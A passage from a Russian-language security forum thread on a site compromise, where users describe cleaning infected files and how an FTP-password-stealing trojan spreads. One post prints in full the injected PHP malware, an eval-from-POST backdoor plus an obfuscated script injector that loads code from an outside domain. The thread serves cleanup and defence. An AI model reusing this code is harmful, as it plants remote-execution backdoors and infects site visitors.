Перейти к содержанию

Фишинг-атака


Рекомендуемые сообщения

MAM, смените пароли на ftp, проверьте компьютер с которого есть административный доступ. И перезалейте патченные файлы (js и php?).

Изменено пользователем akoK
Ссылка на комментарий
Поделиться на другие сайты

для полного удаление пришлось еще почистить PHP файлы с данной строкой:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBhdjhUPSd2
QDYxckAyMGFAM2RAMjJTQDYzckA2OXB0QDQ1QDZlZ2luZUAyMkAyY2JAM2RAMjJWQDY1cnNpb0A2ZSgp
K
0AyMkAyY2pAM2RAMjJAMjJAMmN1QDNkQDZlYXZpQDY3YUA3NEA2ZkA3MkAyZXVzQDY1ckFANjdlbnRAM
2
JANjlANjYoKHVAMmVpbmRleE9ANjYoQDIyV2luQDIyKUAzZTApQDI2QDI2QDI4QDc1QDJlaW5ANjRlQD
c
4QDRmZihAMjJOVEAyMDZAMjIpQDNjMClAMjZAMjZAMjhANjRANmZANjN1bWVudEAyZWNvb2tpZUAyZUA
2
OW5kZXhANGZmKEAyMm1pZUA2YkAzZDFAMjIpQDNjMClAMjZAMjYodEA3OXBANjVvQDY2KHpANzJANzZ6
d
HMpQDIxQDNkQDc0eUA3MGVvQDY2KEAyMkA0MUAyMikpQDI5QDdiekA3MnZAN2FANzRzQDNkQDIyQUAyM
k
AzYkA2NUA3NmFsKEAyMmlANjYod2luZG93QDJlQDIyK2ErQDIyKWpAM2RANmErQDIyK2ErQDIyQDRkYW
p
ANmZANzJAMjIrYkAyYkA2MStAMjJANGRpbkA2ZnJAMjIrQDYyQDJiYStAMjJCQDc1QDY5QDZjZEAyMit
i
K0AyMkA2YUAzYkAyMkAyOUAzYmRANmZjdW1lbkA3NEAyZUA3N3JpQDc0ZUAyOEAyMkAzY3NANjNyaXB0
Q
DIwc0A3MmNAM2RAMmZAMmZndW1ibGFyQDJlY25AMmZyc3NAMmZAM2ZpZEAzZEAyMitqK0AyMkAzZUAzY
0
A1Y0AyZnNjcmlwdEAzZUAyMkAyOUAzYkA3ZCc7dmFyIExVQT1hdjhULnJlcGxhY2UoL0AvZywnJScpO2
V
2YWwodW5lc2NhcGUoTFVBKSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Ссылка на комментарий
Поделиться на другие сайты

  • 3 недели спустя...
MAM, смените пароли на ftp, проверьте компьютер с которого есть административный доступ. И перезалейте патченные файлы (js и php?).

Простой сброс паролей не поможет. Как только пароль будет изменен - троян, следящий за фтп-менеджером передаст на удаленную машину новый пароль.

Эта зараза мне известна.

Сначала на компе поселяется троян и следит за паролями ФТП-менеджеров. Периодически отсылает эти пароли удаленному скрипту, который затем загружает вредоносный код на сайт в файлы по маске index.*, auth.* etc. Теперь маска стала достаточно широкой, так что наверное придется перепроверять все файлы.

А код загруженный на сайт сначала направляет на удаленную машину, с которой на компьютер пользователя загружается ранее описанный вирус. Вообще, судя по всему это один из троянов создающих бот-сеть.

Лечится только использованием "качественных" ФТП-менеджеров. С поддержкой SFTP. Я, на пример, использую WinSCP. Ну и естественно очистка машины. Только сначала меняете фтп клиент,а затем чистите машину.

Подробнее я написал здесь.

его видят только АВК и Nod32 (правда Нод не лечит)

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • KL FC Bot
      Автор KL FC Bot
      Недавно нашему бывшему коллеге пришла подозрительная нотификация от неизвестного ему сервиса GetGhared. Будучи человеком осторожным, он не стал переходить по ссылке, а сразу переслал уведомление нам. Проанализировав письмо, мы выяснили, что это действительно работа мошенников, а судя по статистике наших почтовых защитных решений, сервис для отправки больших файлов GetShared стал использоваться ими достаточно часто. Рассказываем, как выглядит применение GetShared в атаках, зачем злоумышленникам это нужно и как оставаться в безопасности.
      Как выглядит атака при помощи GetShared
      Жертве приходит вполне обычное, совершенно настоящее уведомление от сервиса GetShared, в котором говорится, что пользователю был прислан файл. В письме указаны название и расширение этого файла — например, в случае с атакой на компанию нашего коллеги это был DESIGN LOGO.rar.
      Пример мошеннического письма, распространяемого через уведомление GetShared
      В сопровождающем тексте применяется стандартная фишинговая уловка — мошенники запрашивают цены на что-то, якобы перечисленное в приложении, а для большей убедительности просят уточнить время доставки и условия оплаты.
       
      View the full article
    • foroven
      Автор foroven
      Добрый день. После того как мы словили вирус шифровальщик и был установлен антивирусный продукт лаборатории Касперского, в его журнале каждый час стали появляться записи о сетевой атаке. Причем адрес атакующего компьютера это Linux-система с установленным Kerio Control. Может ли Касперсий так реагировать на его работу? Или он может быть заражен? Спасибо.
    • KL FC Bot
      Автор KL FC Bot
      В попытке обойти механизмы защитных решений злоумышленники все чаще прячут вредоносные и фишинговые ссылки внутрь QR-кодов. Поэтому в решение [KSMG placeholder] Kaspersky Secure Mail Gateway [/placeholder] мы добавили технологию, способную «читать» QR-коды (в том числе и спрятанные внутрь PDF-файлов), доставать из них ссылки и проверять их до того, как они окажутся в почтовом ящике сотрудника компании. Рассказываем, как это работает.
      Пример фишингового QR-кода внутри PDF-файла
       
      View the full article
    • KL FC Bot
      Автор KL FC Bot
      Атаки на open source чаще всего сводятся к публикации новых вредоносных пакетов в репозиториях. Атака, произошедшая 14 марта, из другой лиги — злоумышленники скомпрометировали популярный процесс (GitHub Action) tj-actions/changed-files, который применяется более чем в 23000 репозиториев.  Инцидент получил номер CVE-2025-30066, этой уязвимости подвержены все репозитории, в которых использовался заражённый процесс changed-files. Хотя администрация заблокировала changed-files, а затем откатила его к безопасной версии, все, кто пользовался им должны провести реагирование на инцидент, а сообщество разработчиков — извлечь из него более общие уроки.
      Что такое GitHub Actions
      Рабочие процессы (GitHub Actions) упрощают разработку ПО при помощи автоматизации типовых задач DevOps. Они могут стартовать при наступлении каких-то событий в GitHub, например коммитов. У GitHub есть условный «магазин приложений», в котором можно взять готовый процесс и применить его в своём репозитории, например популярны процессы для автоматической инсталляции вспомогательных инструментов. Чтобы интегрировать в свой сборочный конвейер CI/CD такой готовый процесс GitHub, достаточно всего одной строчки кода.
       
      View the full article
    • KL FC Bot
      Автор KL FC Bot
      Чуть больше года назад в посте Google OAuth и фантомные аккаунты мы уже обсуждали, что использование опции «Вход с аккаунтом Google» в корпоративные сервисы дает возможность сотрудникам создавать фантомные Google-аккаунты, которые не контролируются администратором корпоративного Google Workspace и продолжают работать после оффбординга. Недавно выяснилось, что это не единственная проблема, связанная с OAuth. Из-за недостатков этого механизма аутентификации любой желающий может получить доступ к данным многих прекративших деятельность организаций, перерегистрировав на себя брошенные компаниями домены. Рассказываем подробнее об этой атаке.
      Как работает аутентификация при использовании «Вход с аккаунтом Google»
      Некоторые могут подумать, что, доверяя опции «Вход с аккаунтом Google», компания получает надежный механизм аутентификации, использующий продвинутые технологии Google и широкие возможности интернет-гиганта по мониторингу пользователей. Однако на деле это не так: при входе с Google OAuth применяется достаточно примитивная проверка. Сводится она, как правило, к тому, что у пользователя есть доступ к почтовому адресу, который привязан к Google Workspace организации.
      Причем, как мы уже говорили в предыдущем материале о Google OAuth, это вовсе не обязательно Gmail — ведь привязать Google-аккаунт можно совершенно к любой почте. Получается, что при использовании «Входа с аккаунтом Google» доступ к тому или иному корпоративному сервису защищен ровно настолько надежно, насколько защищен почтовый адрес, к которому привязан Google-аккаунт.
      Если говорить несколько более подробно, то при аутентификации пользователя в корпоративном сервисе Google OAuth отправляет этому сервису следующую информацию:
      В теории в ID-токене Google OAuth есть уникальный для каждого Google-аккаунта параметр sub, но на практике из-за проблем с его использованием сервисы проверяют лишь домен и адрес электронной почты. Источник
       
      View the full article
×
×
  • Создать...